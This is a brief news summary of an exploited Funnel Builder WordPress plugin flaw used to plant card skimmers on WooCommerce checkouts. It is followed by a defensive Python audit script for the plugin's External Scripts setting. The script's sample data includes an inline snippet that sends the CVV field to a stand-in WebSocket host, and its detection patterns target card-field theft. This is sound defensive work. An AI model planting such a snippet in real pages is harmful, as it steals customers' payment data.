A critical vulnerability in the WordPress Funnel Builder plugin was actively exploited, allowing attackers to inject malicious JavaScript into WooCommerce checkout pages and steal customer payment information. The flaw, which affects all versions prior to 3.15.0.3, can be exploited without authentication, Bleeping Computer reports.

The vulnerability in the Funnel Builder plugin, used by over 40,000 websites, allows unauthenticated attackers to modify global plugin settings via an unprotected checkout endpoint. This enables the injection of arbitrary JavaScript into the plugin's "External Scripts" setting, so the injected code runs in every visitor's browser on every checkout page. Security company Sansec detected the attacks, noting that the payload disguised itself as a legitimate analytics script and established a WebSocket connection to an attacker-controlled server. That server then delivers a payment card skimmer designed to steal credit card numbers, CVVs, billing addresses, and other customer data.

FunnelKit released version 3.15.0.3 to address the vulnerability and recommended that all users update immediately and review their External Scripts setting for any rogue additions.

Source: Bleeping Computer
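Updating closes the injection vector but does not remove a script that was already planted, so the review of the External Scripts setting matters. The following is an added example (not code from the article, FunnelKit or Sansec) of how a site operator could triage that setting offline: paste the raw value into a string and flag script tags that load from hosts outside a per-site allowlist, or inline scripts that open a WebSocket, decode or eval code at runtime, or touch card fields. The allowlist, the heuristic patterns and the sample setting are all constructed assumptions; the article does not name the database option the setting is stored in, so how you export the value (plugin settings page or a WP-CLI option dump) is left to you.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# Hosts this site deliberately loads scripts from (constructed allowlist; adjust per site).
KNOWN_GOOD_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}

# Matches each <script ...>...</script> block in the setting value.
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.I)

# Heuristic indicators for inline scripts (assumptions, not signatures from the report):
# a skimmer needs an exfiltration channel, often hides its code, and reads card fields.
INLINE_INDICATORS = {
    "websocket": re.compile(r"\bnew\s+WebSocket\s*\(|\bwss?://", re.I),
    "dynamic_eval": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(", re.I),
    "base64_decode": re.compile(r"\batob\s*\("),
    "card_fields": re.compile(r"\b(cvv|cvc|card[-_ ]?number|cardnumber)\b", re.I),
}


@dataclass
class Finding:
    index: int                 # position of the <script> block within the setting
    kind: str                  # "external" (has src=) or "inline"
    src: Optional[str]
    reasons: List[str] = field(default_factory=list)


def host_of(src: str) -> str:
    """Return the host a src attribute points at; '' for same-origin/relative paths."""
    if src.startswith("//"):          # protocol-relative URL
        src = "https:" + src
    return urlparse(src).hostname or ""


def audit_external_scripts(setting_value: str, allowlist=KNOWN_GOOD_HOSTS) -> List[Finding]:
    """Flag script blocks in an 'External Scripts'-style setting that deserve a manual look."""
    findings: List[Finding] = []
    for i, m in enumerate(SCRIPT_TAG.finditer(setting_value)):
        attrs, body = m.group(1), m.group(2)
        src_match = SRC_ATTR.search(attrs)
        if src_match:
            src = src_match.group(1)
            host = host_of(src)
            # Same-origin scripts are not judged by host; anything remote must be allowlisted.
            if host and host not in allowlist:
                findings.append(Finding(i, "external", src,
                                        [f"loads from non-allowlisted host {host!r}"]))
        else:
            reasons = [name for name, pat in INLINE_INDICATORS.items() if pat.search(body)]
            if reasons:
                findings.append(Finding(i, "inline", None, reasons))
    return findings


# Constructed sample: one legitimate tag-manager include, then an inline block that
# looks like analytics but opens a socket to a third party and reads the CVV field.
SAMPLE_SETTING = """
<script src="https://www.googletagmanager.com/gtag/js?id=G-EXAMPLE" async></script>
<script>
  /* analytics bootstrap */
  var s = new WebSocket("wss://analytics-cdn.example/ws");
  s.onopen = function () { s.send(document.querySelector("#cvv").value); };
</script>
"""

if __name__ == "__main__":
    for f in audit_external_scripts(SAMPLE_SETTING):
        print(f"script #{f.index} ({f.kind}, src={f.src}): {', '.join(f.reasons)}")
```

A clean result from this check is not proof of a clean site: a skimmer can also be loaded by an allowlisted-looking host you added by mistake, or planted elsewhere in the theme or database, so compare the setting against what you know you configured and check the rendered checkout page as well.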